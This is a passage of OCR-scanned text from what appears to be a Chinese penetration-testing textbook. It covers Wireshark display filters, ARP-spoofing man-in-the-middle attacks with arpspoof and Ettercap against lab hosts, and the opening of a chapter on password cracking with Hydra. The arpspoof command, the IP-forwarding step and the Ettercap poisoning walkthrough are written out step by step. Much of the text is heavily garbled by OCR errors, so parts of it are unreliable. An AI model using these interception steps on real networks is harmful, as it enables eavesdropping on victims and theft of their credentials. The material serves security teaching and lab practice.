> Internet Protocol version 6, Src: fe80::8497:86d4: us S pao ffO2 
> User Datagram Protocol, Ste Port: 546, DSE Port: 547 


> DHCPv6 


图 12-8 ”DHCPvV6 数 据 包 的 详细 信息 


图 12-8 中 的 数据 包 


一 共 分 成 了 5 层 ， 依 次 为 Frame、Ethernet、IP、 


UDP、DHCPv6， 每 一 层 前 面 有 一 个 黑色 的 三 角形 图 标 ， 单 击 这 个 图 标 


可 以 展开 数据 包 这 一 层 的 详细 信息 ， 
UDP 的 详细 信息 天 可 以 单 击 前 面 的 三 


例如 我 们 来 但 看 一 下 这 个 数据 包 中 
角形 图 标 ， 如 图 12- 9 上 所 示 。 


> Frame 4: 150 bytes on wire (1200 d 150 Ine captured- (1200 bits) on interface O 
> Ethernet II, Src: vmware cO:00: zi n :50:56:c0:00:08), Dst: IPv6mcast 01:00:02 (33:33: 
» Internet Protocol version 6, Sr 80::8497: 2002; CLE 18b3, DSE: nga 

Da ge. a vet Dst For 


Source Port: 546 
Destination Port: 547 
Length: 


96 
ES or ded AM a ds Pit 
[Checks ified] 
am debe 





DHUF VD 


图 12-9 ”DHCPv6 数 据 包 UDP 层 的 详细 信息 


使 用 Wireshatk 来 捕获 数据 包 的 方法 很 简单 ， 但 是 在 正 第 情况 下 ， 我 
们 所 使 用 的 计算 机 由 于 会 有 大 量 的 通信 ， 所 以 在 很 短 的 时 间 内 就 有 大 量 
的 数据 包产 生 ， 要 从 这 么 多 有 的 数据 包 中 找到 我 们 所 需要 的 数据 包 束 变 成 
了 一 件 十 分 困难 的 事情 。 设 想 一 下 ， 和 警察 经 第 要 但 阅 几 百 个 小 时 的 监控 
极 像 来 公 找 嫌疑 人 这 个 工作 的 任务 量 到 捕 有 和 多大， 而 在 几 十 万 个 数据 包 
中 去 查找 符合 指定 要 求 的 数据 包 要 比 这 个 任务 还 复 林 得 多 。 


为 此 Wireshark 为 使 用 独 找 伏 了 两 个 过 小 大 ， 一 个 是 显示 过 滤 右 ， 为 
一 个 是 捕获 过 小 占 。 需 要 特别 强调 一 点 ， 这 两 个 过 滤 右 使 用 的 是 不 同 的 
过 涛 语法 。 显 示 过 小 需 较为 实用 ， 我 们 在 使 用 Wireshark 捕 获 数 据 包 的 时 
候 ， 无 需 事先 设 定 任何 条 件 ， VITSE IE 78 WIA A R UL. 但 是 可 以 
根据 指定 的 条 件 将 不 符合 条 件 的 数据 包 过 滤 挥 ， 只 显示 那些 从 合 条 件 的 
数据 包 。 这 个 过 滤 右 位 于 工具 栏 的 下 方 ， 如 图 12-10 所 示 。 


File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 


NW 4ooxoo«e«».-€»-—Er|e sa att 














No. Time Source Destination Prot Lenc Info 
114 944.200768722 fe80::8497:86d4:144.. ff02::1:2 D. 150 Solicit XID: Ox793be5 Cl 
115 962.435100201 192.168.169.1 192.168.16. B.. 243 Host Announcement ADMIN- 
116 977.975541092 192.168.169.1 192.168.16. N. 92 Name query NB T.L.YOUKU, 
117 978.725792096 192.168.169.1 192.168.16. N.. 92 Name query NB T.L.YOUKU. 
118 979.475065862 192.168.169.1 192.168.16. Ni 92 Name query NB T.L.YOUKU. 
119 1037.9725315.. 192.168.169.1 192.168.16. N.. 92 Name query NB T.L.YOUKU. 
120 1038.7207951.. 192.168.169.1 192.168.16. Ni 92 Name query NB T.L.YOUKU, 


图 12-10 “Wireshark 中 的 显示 过 滤器 


过 滤器 可 以 基于 协议 、 应 用 、 地 址 等 构造 识别 大 小 写 ， 但 通常 
使 用 AS S. 下 面 我 们 先 来 构造 一 个 只 能 显示 ICMP 数 据 包 的 显示 过 滤 
右 ， 这 一 点 很 容易 实现 。 首 先 我 们 在 一 个 终 关 ping 任 意 的 一 个 地 址 产生 
IC MPH A 包 ， 如 图 12-11 所 示 。 


root@kali: ~ o o o0 


File Edit View Search Terminal Help 
:~# ping www.baidu.com 
PING www.a.shifen.com (220.181.112.244) 56(84) bytes of data. 
64 bytes from 220.181.112.244 (220.181.112.244 : icmp seq-l ttl-128 time-8.26 ms 


220.181.112.244 : icmp_seq=3 ttl=128 time=7.06 ms 
220.181.112.244): icmp seq=4 ttl=128 time=8.21 ms 


64 bytes from 220.181.112.244 
4 bytes from 220.181.112.244 





( 

64 bytes from 220.181.112.244 (220.181.112.244): icmp seq=2 ttl=128 time=7.95 ms 
( 
( 


图 12-11 产生 ICMP 数 据 包 


我 们 在 文本 框 中 输入 “icmp” 即 可 完成 这 个 显示 过 滤器 ， 然 后 按 下 回 
车 键 即 可 ， 如 图 12-12 所 示 。 





*ethO ooo 
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EZO n X O A «»*.2!9 --|«a at 
(A ficmp 


No. Time Source 
Eee m— 





ES -| Expression... + 










Destination Prot Lenc Info 
22 1o Echi 









e 






1113 9451.7949708.. 220.181.112.2.. 192.168.106. I. 
TTT5/9052 79802981 192 158.1689 1 220 TBT 3155 T 
1117/9492. 7952339. 220:181 11272: 192:.1858:15.. T. 
T1T78:9g453 7902308. 192; 158.169: 15. 220 LBI 11, D. 


T120:94093 7972827... 220: 191, 112.2. 192. 1588; 15. Ii 

1121 9454.7920939.. 192.168.169.1.. 220.181.11. I. id-0x085 

1122 9454.8002905.. 220.181.112.2. 192.168.16. I. id-0x085.- 

117»? AARRE 7044 4604 LUN e Lo 490 47449gm 4 7257293. 4 434. 44 T no Cch^lkuduainidisiadl O 11000 C 1 同一 emeE 
k 


Frame 1112: 98 bytes on wire (784 bits), 98 bytes c 
> Ethernet II, Src: Vmware_12:dd:23 (00:0c:29:12:dd:23), D 





> Internet Control Message Protocol 


图 12-12 ”使 用 icmp 显 示 过 滤器 
应 用 这 个 过 滤 显 示 器 之 后 ， 其 他 次 型 的 数据 包 吏 不 会 显示 了 。 
下 面 我 们 来 便 早 介绍 显示 过 小 右 的 构 志 语法 ， 目 先 来 看 如 何 构 迄 基 
于 协议 的 显示 过 滤器 ， 例 如 只 显示 ARP 协 议 数据 包 的 话 ， 那 么 就 可 以 构 
造 。 


这 个 显示 过 小 右 会 屏蔽 挥 所 有 除了 包括 ARP 请 求 和 回复 之 外 的 数据 
EL. 


也 可 以 使 用 各 种 比较 运算 符 〈 例 如 ==，! = 等 ) 来 扩展 显示 过 小 
器 ， 例 如 我 们 只 显示 所 有 源 地 址 为 192.168.1.103 的 数据 包 。 


ip.src == 192.168.1.103 


Az PUR Win E7380 E] 2 S EL, P ASEA P BIER i8 e 


tcp.srcport !- 80 


在 这 个 显示 过 滤器 的 最 右 侧 还 有 一 个 “Expression” 按 钮 ， 单 击 这 个 


按钮 可 以 使 用 显示 过 滤器 的 构造 窗口 ， 如 图 12-13 所 示 。 


File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 
a aag 


BH (GO vb XO ae.» JAH 


Alime BE Bresson.. | * 
) reques d=0x085 


No. Time goure Destination Prot Lenc Lis 
> 0491 7867348 TETERE EIE 





图 12-13 ”显示 过 滤器 的 构造 按钮 
打开 这 个 最 示 过 小 右 的 构造 窗口 ， 如 图 12-14 所 示 。 


Wireshark . Display Filter Expression e | 


Field Name Relation 


> 104apci: IEC 60870-5-104-A... 
^ 104asdu - IEC 60870-5-104-... 
29West - 29West Protocol 
» 2dparityfec - Pro-MPEG Code .… 
> 3COMXNS : 3Com XNS Encap... 
> 3GPP2 A11 - 3GPP2 A11 
> 6LoWPAN : IPv6 over Low po... 
^ 802.11 Radio - 802.11 radio i... 
> 802.11 Radiotap : IEEE 802.1... 
^ 802.11 RSNA EAPOL : IEEE 8... 
^ 802.3 Slow [fotocols : Slow ... 
> 9P.Plan 9 
^ A-bis OML: GSM A-bis OML 
^» A21- A21 Protocol 
> AAF - AVTP Audio Format 
AAL1 - ATM AAL1 
AAL3/4 - ATM AAL3/A 





Predefined Values 








> AARP - Appletalk Address Res... 


Range (offset:length) 
Search: 
No display filter 


A hint. 


Help Cancel 
图 12-14 Mops AE fg H 


这 个 过 滤 右 的 构造 窗口 分 成 几 个 部 分 ， 左 侧 是 “Field Name", ixi 
要 是 各 种 协议 和 协议 的 各 个 字段 。 右 侧 上 方 的 “Relation” 包 含 的 是 
ee 右 侧 中 辐 的 “Value”* 是 空白 ， 用 来 填写 各 种 值 。 例 如 
D 就 来 构造 一 个 只 显示 来 自 192.168.1.103 发 出 来 数据 包 的 过 滤 
如 图 12-15 所 示 。 


Wireshark : Display Filter Expression e 


Field Name Relation 


ip.opt.type.copy : Copy on … ^ is o 


ip.opt.type.number - Number 
ip.proto - Protocol 
ip.reassembled. in - Reasse... 





ip.reassembled.data - Reass... 
ip.reassembled.length : Rea... 
e. rec rt : Recorded Route 

LL LIC) x OT 


A YAV 





ip.src - Source 
L) 


. g OU — 
ip.src.- _rt - Source Route Value (IPv4 address) 


psrcrthost-SouceRou. ]|1921681103 | | | 


ip.subopt. too. long : Exper... 
ip.tos - Type of Service 
ip.tos.cost - Cost 
ip.tos.delay - Delay 
ip.tos.precedence : Preced... 
ip.tos.reliability - Reliability 


in tac throunhnut- ThrouĦnh 


Search: IP 







——— 
ip.src == 192.168.1.103 





Click OK to insert this filter 


Help Cancel 


图 12-15 ”使 用 构造 窗口 构造 显示 过 小 器 


我 们 首先 在 左 侧 的 “Field Name” 里 列表 中 找到 IP， i al vip 

ip. src 字 段 。 在 关系 运算 中 找到 “==”， 然 后 在 Value 中 填写 耻 值 。 填 与 完 

毕 之 后 可 以 看 到 下 方 绿 颜色 的 部 分 就 显示 了 构造 好 的 显示 过 寸 滤器 ， 完成 
之 后 单 击 “OK2” 即 可 。 


12.3 fiHjarpspoofZt 17 W 2& EX Uy 


TER HHBUPIZRTB, HEITA REH a AE La. XXI A rn 
HUE] da]. AERE VE IUD LH e de DC Ao E £8 AAT 28 LT f 
A. MIIR TE N e EP) SU fi IR HJ4T Z3 SUPR ZJ PIS RR S TEXAN 
期 ， 我 们 只 需要 将 网 卡 更 改 为 混杂 模式 即 可 接收 到 区 个 网 络 的 数据 。 但 
征 在 现在 的 网 络 中 使 用 的 设备 是 交换 机 ， 这 个 时 期 我 们 瓯 不 能 仅仅 依靠 
ER PR SES 
b ji vn] 。 


在 Kali Linux 2 中 提供 了 很 多 可 以 实现 网 络 欺 骗 的 工具， 我 们 自 先 以 
其 中 最 为 典型 的 arpspoof 来 演示 一 下 ， 背 先 在 Kali Linux 2 中 打开 一 个 终 
端 ， 输 入 “arpspoof” 就 可 以 启动 这 个 工具 ， 如 图 12-16 所 示 。 





图 12-16 ”在 终 病 中 局 动 arpspootf 


这 个 工具 的 使 用 格式 为 : 





现在 我 们 的 主机 IP 地 址 为 192.168.169.130， 要 欺骗 的 目标 主机 IP 地 
址 为 192.168.169.131。 现 在 这 个 网 络 的 网 关 是 192.168.169.2， 所 有 主机 
与 外 部 的 通信 都 是 通过 这 一 全 主机 完成 的 ， 所 以 我 们 只 需要 伪装 成 网 
DRE: 那么 我 们 现在 的 实验 中 所 涉及 的 主机 包 
D 下 IN: 


e 攻击 者 : 192.168.169.130 


e 被 欺骗 主机 : 192.168.169.132 
e ERA: 192.168.169.2 


PIE 3j fis FHarpspoof?K FE B — Ux Pod 258 EX Jjs : 





root@kali:~# arpspoof -i eth6 -t 192.168.169.132 192.168.169.2 


执行 的 过 程 如 图 12-17 所 示 。 


# arpspoof -i eth0 -t 192.168.169.132 192.168.169.2 
0: d: :29: 12: T 23 0:c:29:90:2f:69 0806 42: arp reply 192.168.169.2 is-at 0:c:29:12 





0: C. :29: 12:dd:23 0:c:29:90:2f:69 0806 42: arp reply 192.168.169.2 is-at 0:c:29:12 
:dd:23 


图 12-17 正在 进行 攻击 的 arpspoof 


现在 受到 欺骗 的 主机 192.168.169.132 就 会 把 192.168.169.130 当 做 是 
网 天 ， 从 而 把 所 有 的 数据 都 发 送 到 这 个 主机 ， 我 们 在 主机 
192.168.169.132 上 伍 看 Arp 表 丈 可 以 看 到 ， 此 时 192.168.169.2 与 
192.168.169.130 的 mac 地 址 是 相同 的 ， 如 图 12-18 所 示 。 


s and Settings*füdministrator»arp -a 
一 一 一 Bx2 
10 30 | D 0 d sso 


T (m 
192.168.169.2 TE 8c-29-12—-dd-23 dynamic 
192. 168: 169 .139 080—80c-29-12—-dd-23 dynamic 





图 12-18 ”被 欺骗 主机 的 ARP 表 


现在 arpspoof 完 成 了 对 目标 主机 的 欺骗 任务 ， 可 以 截获 到 目标 主机 
发 往 网 天 的 数据 包 。 但 是 这 里 有 两 个 问题 ， 首 先 arpspoof 仅 仅 是 会 ERAR 
这 些 数 据 包 ， 并 不 能 得 看 这 些 数据 包 ， 上 所 以 我 们 还 需要 使 用 专门 个 看 数 
据 包 的 工具 ， 例 如 driftnet。 同时 我 们 的 二 机 也 个 会 骨 将 这 党 数据 包 轻 及 
到 网 关 ， 这 桩 将 会 号 至 目标 主机 无 法 止 而 十 网 ， 所 以 我 们 需要 在 主机 上 
开局 转发 功能 。 首 先 打 开 一 个 终 决 ， 开 局 的 方法 如 下 所 示 。 


root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip forward 


这 样 我 们 束 可 以 将 惟 获 到 的 数据 包 再 转发 出 去 ， 被 欺骗 的 主机 束 仍 
然 可 以 正常 上 网 了 ， AK riti 7515 8 9 j 受 到 了 攻击 。 此 时 ， 我 们 可 以 使 用 
Tcpdump 或 者 Wireshark 来 捕获 这 些 其 他 主机 的 数据 包 了 。 


12.4 ”使 用 Ettercap 进 行 网 络 嗅 探 


Arpspoof 的 使 用 十 分 人 简单， 但 是 只 实现 了 网 络 欺 驴 功能， 如果 要 实 
现 进 一 步 的 渗透 ， 还 需要 其 他 工具 的 配合 ， 这 对 于 初学 者 来 说 ， 可 能 有 
一 定 的 难度 。 现 在 我 们 来 介绍 一 个 集成 了 更 多 功能 的 工具 
Ettercap 。 最 初 的 Ettercap 只 是 被 议 计 用 来 进行 网 络 别 探 ， 但 是 随 独 越 来 
越 多 功能 的 加 入 ， 现 在 它 已 经 变 成 了 一 于 功能 极为 强大 的 网 络 攻 击 工 
其， 利用 这 区 工 具 甚至 可 以 完成 对 加 答 通 信 的 监听 。 


Kali Linux 2 中 集成 了 这 款 工 具 ，Ettercap 拥 有 两 种 工作 方式 ， 既 可 
以 工作 在 命令 行 中 ， 也 可 以 工作 在 图 形 化 界面 。 这 里 我 们 主要 来 介绍 如 
何在 图 形 化 界面 中 操作 Ettercap， 依 次 选择 “Applications”09-Sniffing & 
Spoofing”ettercap-gui”， 驳 可 以 使 用 图 形 化 操作 方式 打开 Ettercap， 如 疼 
12-19 所 示 。 


司 动 之 后 的 Ettercap 的 图 形 化 操作 界面 如 图 12-20 所 示 。 





01 - Information Gathering 


Favorites i bdfproxy 
tòa 


me driftnet 


02 - Vulnerability Analysis 
03 - Web Application Analysis PE ettercap-g.. 


04 - Database Assessment 

ferret 
05 - Password Attacks : 
06 - Wireless Attacks : indi 
07 - Reverse Engineering macchanger 
08 - Exploitation Tools 

mitmproxy 
09 - Sniffing & Spoofing 


10 - Post Exploitation netsniff-ng 


11 - Forensics responder 
12 - Reporting Tools 

wireshark 
13 - Social Engineering Tools 
14 - System Services 


Usual applications 





图 12-19 ”以 图 形 化 的 界面 司 动 Ettercap 


ettercap 0.8.2 0o00 
File Sniff Options Info 





图 12-20 ”图 形 化 Ettercap 的 启动 界面 
EttercapH]35 1T 7; 3X Unified fll Bridged AP - 
e Unified7; 3X & LP IRL A ZI SARI, XXe Eoo FSI 7 UU IA. 
e Bridged/; XXZe £EoU9] RT DU hs, LER PAPE -R ZLIRIBS AUS BL, XX 
种 方法 并 不 经 沼 使 用 。 


我 们 可 以 在 成 功 司 动 Ettercap 之 后 利用 沫 单 中 的 Sniff 人 选项 来 选择 运行 
的 方式 ， 如 图 12-21 所 示 。 





ettercap 0.8.2 





图 12-21 ”使 用 菜单 Sniff 选 项 选择 运行 方式 


在 这 里 我 们 选择 了 第 一 种 Unified 模 了 式 之 后 ， 接 下 来 就 需要 指定 要 使 
用 的 网 卡 : 


这 个 网 卡 的 选择 可 以 根据 基体 的 情况 进行 选择 。 例 如 我 们 这 里 使 用 
的 本 地 的 有 有 线 网 络 进 行 测 试 ， 所 以 选择 的 是 eth0， 如 图 12-22 所 示 。 如 果 
使 用 的 是 无 线 网 络 ， 则 需要 选择 wlan0。 选 择 完 网 卡 之 后 ， 你 可 以 很 明 
显 地 发 现 Ettercap 操 作 界 面 的 变化 ， 如 图 12-23 所 示 。 


ettercap Input e 
Network interface : 


| Cancel | | OK | 


图 12-22 为 Ettercap 指 定 进行 监听 的 网 卡 


ettercap 0.8.2 oo 
Start Targets Hosts View Mitm Filters Logging Plugins Info 





图 12-23 ”Ettercap 的 工作 界面 


站 先 我 们 需要 查看 整个 网 络 中 可 以 进行 欺骗 的 主机 ， 这 一 点 可 以 使 
用 菜单 栏 “Hosts” 选 项 中 的 “ 瑟 osts list* 项 来 查看 ， 如 图 12-24 所 示 。 


Hosts View Mitm Filters Loggin 
Hosts list 





Enable IPv6 scan on 
|. Scan for hosts Ctrl--S 
2 Load from file... 
| Save to file... 


[| 12-24 Ettercap 中 的 Hosts 腕 单项 


list” 命 令 之 后 ， 束 可 以 看 到 当前 网 络 中 所 有 的 活跃 主机 
列表 。 


这 里 面 192.168.169.2 是 网 关 的 地 址 ，192.168.169.131 是 目标 计算 机 
的 地 址 。 我 们 将 这 两 个 地 址 作为 Target。 添 加 的 方法 为 : 首先 选中 
192.168.169.2， 然 后 单 击 下 方 的 “addto Target1”， 如 图 12-25 所 示 。 


ettercap 0.8.2 o o o 


Host List x 


2182 known services 
Lua: no scripts were specified, not starting up! 
Starting Unified sniffing.. 


DHCP: [00:0C:29:2D: 7F:89] REQUEST 192.168.169.131 1 
DHCP: [192.168.169.254] ACK : 192.168.169.131 255.255.255.0 GW 192.168.169.2 DNS 192.168.169.2 "localdomain" ] 
y X 
12-25 Ettercap 中 7 yj 活 跃 主机 


然后 按照 同样 的 方法 选中 192.168.169.131， 然 后 单 击 下 方 的 “add to 
Target2”， 这 样 就 选择 好 了 要 欺骗 的 日 标 ， 如 图 12-26 所 示 。 


ettercap 0.8.2 ooo 
Start Targets Hosts View Mitm Filters Logging Plugins Info 


IP Address MAC Address Description 
192.168.169.1  /00:50:56:C0:00:08 
192.168.169.2  /00:50:56:F5:3E:BB 
192.168.169.131 00:0C:29:2D:7F:89 


Delete Host | Add to Target 1 | Add to Target 2 
2182 k rv 
a: n p speci rting up 
arting g.. 
DHCP: [00:0C:29:2D:7F:89] REQUEST 192.168.169.131 
DHCP: [192.168.169.254] ACK : 192.168.169.131 255.255.255.0 GW 192.168.169.2 DNS 192.168.169.2 "localdomain z ] 


图 12-26 ”选择 目标 


如 条 想 要 答 看 设置 好 的 目标 ， 可 以 单 击 来 单 栏 上 的 选项 “<Targets”， 
如 图 12-27 所 示 。 


: Targets Hosts View Mitm Filters Log 





Select target(s) Shift--Ctrl--T | 


Protocol... Ctrl+P 


Reverse matching 
Wipe targets Ctri-- W 
图 12-27 ”Ettercap 中 列 出 的 目标 
图 12-28 中 列 出 了 设置 好 的 目标 。 
选择 好 了 目标 之 后 ， 我 们 就 需要 对 这 个 目标 进行 ARP 欺 骗 ， 这 样 目 


标 才 会 将 用 往 网 关 的 数据 发 到 我 们 的 主机 上 。 现 在 在 菜单 栏 处 选 
中 “ARP poisoning” 选 项， 如 图 12-29 上 所 示 。 


ettercap 0.8.2 eo o0 
Start Targets Hosts View Mitm Filters Logging Plugins Info 


Host List x Targets x 


Target 1 Target 2 
192.168.169.2 192.168.169.131 


| Delete I Add | Delete || Add 





DHCP: [00:0C:29:2D:7F:89] REQUEST 192.168.169.131 

DHCP: [192.168.169.254] ACK : 192.168.169.131 255.255.255.0 GW 192.168.169.2 DNS 192.168.169.2 "localdomain" 

DHCP: [00:0C:29:12:DD:23] REQUEST 192.168.169.130 

DHCP: [192.168.169.254] ACK : 192.168.169.130 255.255.255.0 GW 192.168.169.2 DNS 192.168.169.2 "localdomain" 

Host 192.168.169.2 added to TARGET1 

Host 192.168.169.131 added to TARGET2 ] 


图 12-28 ”Ettercap 中 列 出 的 目标 


etterca 


Start Targets Hosts View Mitm Filters Logging Plugins 


Host List x | Targets x ARP poisoning... 


Target 1 ICMP redirect... 


192.168.169.2 Port stealing... 
DHCP spoofing... 


NDP poisoning... 


Stop mitm attack(s) 


| Delete | | Add | 


图 12-29 ”使 用 Ettercap 对 目标 进行 欺骗 


接 下 来 会 弹出 一 个 中 间 人 攻击 选项 ， 这 里 面 一 共有 两 个 可 选项 ， 勾 
选 上 其 中 “Sniff remote connections” 即 可 ， 如 图 12-30 所 示 。 


一 切 设 置 完毕 之 后 ， 束 可 以 开始 其 驴 了 ， 单 击 末 蛙 位 上 的 “Start” 选 
项 ， 然 后 选中 下 拉 菜 单 上 的 “Start sniffing”， 如 图 12-31 所 示 。 


MITM Attack: ARP Poisoning @ 


ade Optional parameters 
bes | Sniff remote connections. 


| | Only poison one-way. 


| Cancel ll OK | 


图 12-30” 中间人 攻击 选项 








start Targets Hosts View Mitr 
Start sniffing Shift+Ctrl +W 
Stop sniffing Shift+Ctrl+E | 


Exit Ctri- 


"TT 


图 12-31 开始 中 同人 攻击 


现在 从 192.168.169.131 友 出 的 数据 束 都 肥大 到 我 们 的 主机 上 了， 此 
时 单 击 Ettercap 菜 单 栏 上 的 view 选 项 ， 然 后 选中 connections 就 可 以 看 到 有 目 
标 主 机 上 所 有 的 连接 了 ， 如 图 12-32 所 示 。 


ettercap 0.8.2 oo 
Start Targets Hosts View Mitm Filters Logging Plugins Info 


Host List x Targets x 


Host filter Protocol filter Connection state filter 
| |^. & TCP 图 UDP (Other — (Active 图 ldle (& Closing (& Closed Æ Killed 














Host Port - Host Port Proto State TX Bytes RX Bytes m 
192.168.169.131: 68 -:255.255.255.255:67 :UDP : idle 300 0 ] 
192.168.169.131: 57158: -: 192.168.169.2 :53 :UDP idle 34 34 
192.168.169.131:64149 - 224.0.0.252 5355 UDP idle =- 0 
192.168.169.131:63183 - 224.0.0.252 5355 UDP idle ES 0 
192.168.169.131: 137 :-: 192.168.169.2 137 :UDP idle 300 0 
192.168.169.131: 53976: -: 192.168.169.2 :53 :UDP idle 30 98 
197 16R 160131.40207.-. 202 8A 733 1NA :Rn TFP :idle 201 1086 Y 
L View Details | | Kill Connection | | Expunge Connections 
ARP poisoning victims: 一 


GROUP 1 : 192.168.169.2 00:50:56:F5:3E:BB 


GROUP 2 : 192.168.169.131 00:0C:29:2D:7F:89 
Unified sniffing already started... | 


图 12-32 奏 看 到 的 目标 连接 


成 功 执行 这 个 命令 之 后 ， 所 有 从 目标 友 回 网 关 的 流量 部 将 先 经 过 你 
的 计算 机 ， 而 现在 他 与 外 界 的 所 有 通信 都 摆 在 你 的 眼前 了 。 


12.5 ”小结 


EXEPT f UE N RETI IR TAURI UR DUE LA 7316 73 
有 效 的 一 种 攻击 方式 。 几 乎 所 有 的 网 络 安全 机 制 都 是 针对 外 部 的 ， 而 极 
少 会 防御 来 目 内 部 的 攻击 。 因 此 在 网 络 内 部 进行 咒 控 和 欺骗 的 成 功率 极 
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TETR Ze Zt Bü D 122355 2e | HEAREN] APET Aan ESI A] dec AH 
44 RH] — ZXITÁAEME BS 26A LEAL ESPERE, BEREA UTE ME Jo SR] SS — 
件 事情 束 古 利用 网 络 监 昕 截获 了 部 门 领导 的 电子 邮箱 密码 。 力 外 随 看 现 
在 便 件 的 友 展 ， 也 出 现 了 有 人 使 用 妆 载 了 树 每 派 的 无 人 机 进入 到 受 保护 
的 区 域 ， 然 后 连接 到 无 线 网 络 进行 网 络 监听 的 事件 。 


在 下 一 章 中 ， 我 们 将 会 介绍 针对 身份 认证 方式 的 攻击 。 


第 13 章 


里 份 认证 攻击 


网 络 的 肥 展 正在 逐步 地 改变 我 们 的 生活 和 工作 方式 。 我 们 现在 越 来 
越 依赖 网 络 上 各 种 应 用 ， 例 如 妆 我 们 之 间 在 进行 通信 有 的 时 候 ， 通 第 的 方 
式 部 会 是 QQ、 侯 信 或 者 电子 邮箱 ; 而 当 我 们 进行 购物 的 时 候 ， 文 付 
宇 、 铸 信 文 付 以 及 各 种 银行 的 文 付 方式 也 渐渐 取代 了 现金 有 的 交易 方式 。 
这 些 应 用 十 分 便利 ， 无 论 你 在 哪里 ， 只 要 找到 一 全 可 以 连 上 互联 网 的 计 
算 机 ， 痢 可 以 轻而易举 地 使 用 这 些 应 用 。 但 是 这 些 应 用 必须 有 一 种 可 车 
的 号 份 验证 模式 ， 这 种 蛋 陈 指 的 是 计算 机 及 其 应 用 对 操作 者 屿 份 的 确认 
过 程 ， 从 而 确定 访 用 户 是 侣 具有 对 东 种 资源 的 访问 和 使 用 权限 。 


目前 了 最 为 钟 见 的 吴 份 验证 模 陈 采用 的 仍然 是 “用户 名 + 冤 码 ”的 方 
式 ， 用 户 目 行 设 定 密 公 ， 在 登录 时 如 末 输 入 正确 的 密码 ， 计 算 机 束 会 认 
为 操作 者 是 合法 用 户 。 但 是 这 种 认证 方式 的 缺陷 也 很 明显 ， 如 何 保证 窗 
人 码 不 被 六 露 以 及 不 被 破解 已 经 成 为 了 网 络 安全 的 最 大 问题 之 一 。 这 一 草 
中 ， 我 们 会 介绍 基于 密码 破解 的 号 份 认证 攻击 。 和 密码 破解 是 指 利 用 各 种 
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在 本 重 中 将 会 融 我 们 平时 所 使 用 的 几 种 第 见 应 用 进行 号 份 认证 的 攻 
这 几 种 应 用 都 采用 了 密码 的 认证 方式 ， 这 里 我 们 将 围 经 以 下 几 点 展 


e 


XB 


简单 网 络 服务 认证 的 攻击 

使 用 Brupsuite 对 网 络 认 证 服务 的 攻击 
哈 希 密码 破解 

字典 文件 


13.1. 简单 网 络 服务 认证 的 攻击 


网 络 上 很 多 沼 见 的 应 用 都 漆 用 了 密码 认证 的 模式 ， 例 如 FTP、 
telnet、SSH 和 等 。 这 些 应 用 被 广 沁 地 应 用 在 了 各 种 网 络 设备 上 ， 如 果 这 些 
认证 模式 出 现 了 问题 ， 那 束 意 味 看 网 络 中 的 大 量 设备 将 会 沦陷 。 不 秆 的 
是 目前 确实 已 经 有 许多 网 络 设 备 由 于 密码 设置 得 不 够 强壮 而 遭 到 了 入 


侵 。 


针对 这 些 铝 见 的 网 络 服务 认证 ， 我 们 可 以 采用 一 种 “ 骏 力 破解 的 方 
法 。 这 种 方法 的 思路 很 徐 单 ， 束 是 把 所 有 的 可 能 的 密 但 都 符 斌 一通 ， 通 
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这 种 站 路 最 为 简单 ， 攻 击 者 只 需要 利用 攻击 工具 将 用 户 名 和 字典 文 
件 中 的 密码 组 合 起 来 ， 一 个 个 地 去 进行 竹 试 即 可 。 破 解 成 功 的 几率 与 选 
用 的 字典 有 很 大 的 关系 ， 因 为 目标 用 户 通 第 不 会 选用 坚 无 意义 的 字符 组 
合作 为 密码 ， 所 以 对 目标 用 户 有 一 定 的 了 解 可 以 帮助 我 们 更 好 地 选择 字 
典 。 以 我 的 经 验 而 言 ， 大 多 数字 典 文 件 都 是 以 英文 单词 为 主 ， 这 些 字 生 
文件 更 适合 破解 以 瑞 语 为 第 一 语言 用 尸 的 窗 码 ， 对 于 破解 母语 非 严 语 的 
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纯 的 数字 和 字母 的 组 合 ， 因 此 很 多 人 会 采用 字符 + 数字 的 密码 方式 ， 例 


如 使 用 菜 人 的 名 字 加 上 生日 就 古 一 种 很 常见 的 密码 (很 多 人 都 以 目 己 护 
了 的 殉 文 名 字 加 出 生日 期 作为 密码 ) ， 如 果 我 们 仪 仪 使 用 一 些 和 常见 的 英 
文 早 词 作为 字典 的 内 容 ， 显 然 上 共有 一 定 的 局 限 性 。 而 混合 攻击 则 是 依 菲 
一 定 的 算法 对 字典 文件 中 的 单词 进行 处 理 之 后 再 使 用 。 一 个 最 简单 的 算 
法 束 是 在 这 些 单词 前 面 或 者 后 面 添 加 一 些 彰 见 的 数字 ， 比 如 说 一 个 单 
词 “test”， 经 过 算法 处 理 之 后 就 会 变 

成 “test1l1” “test2”...... “test1981”“test19840123” 等 。 


3. ERAT 


这 是 一 种 最 为 粗暴 的 攻击 方式 ， 实 际 上 这 种 方式 并 不 十 要 字典， 而 
是 由 攻击 工具 将 所 有 的 密码 穷 举 出 来 ， 这 种 攻击 方式 退 妾 需要 很 长 的 时 
间 ， 也 是 最 为 个 可 行 的 一 种 方式 。 但 是 在 一 些 早 期 的 系统 中 ， 痢 采用 了 
6 位 长 度 的 纯 数字 密码 ， 这 种 方法 则 是 非 第 有 效 的 。 


图 13-1 中 我 们 给 出 了 一 个 使 用 认证 登录 的 界面 ，IP 地 址 为 
192.168.1.103 的 服务 器 上 提供 了 FTP 服 务 ， 这 个 服务 的 拥有 者 将 密码 提 
供给 了 合法 的 用 户 。 有 用户 通过 密码 认证 之 后 就 可 以 访问 里 面 的 资源 了 。 


下 面 我 们 就 来 讲解 一 下 针对 这 种 网 络 身 份 验证 的 渗透 过 程 ， 这 次 我 
们 使 用 Hydra 作 为 渗透 工具 。Hydra 的 本 意 为 希腊 神话 中 的 九 涉 蛇 ， 是 一 
蒜 非 常 强 大 的 网 络 服务 密码 人 破解 工具 。Hydra 既 有 Windows 版 本 也 有 
Linux 版 本 ， 它 的 模块 引擎 使 得 它 可 以 很 轻易 地 支持 新 的 服务 协议 。 当 
前 最 新 版 本 的 Hydra 是 8.6， 支 持 对 30 多 种 常见 的 网 络 服务 或 协议 的 破 
解 ， 其 中 包括 AFP、Cisco AAA、FTP、HTTP、POP3、SNMP、SSH、 
Telnet 等 。 


在 kali linux 2 中 己 经 安装 了 Hydra， 我 们 可 以 在 Applications 中 依次 时 
击 “05-Password Attacks"*Online Attacks”hydra” 来 启动 这 个 工具 ， 如 图 
13-2 所 示 。 


需要 进行 身份 验证 z 


ftp://192.168.1.103 RAAR kie HAr BHE. 


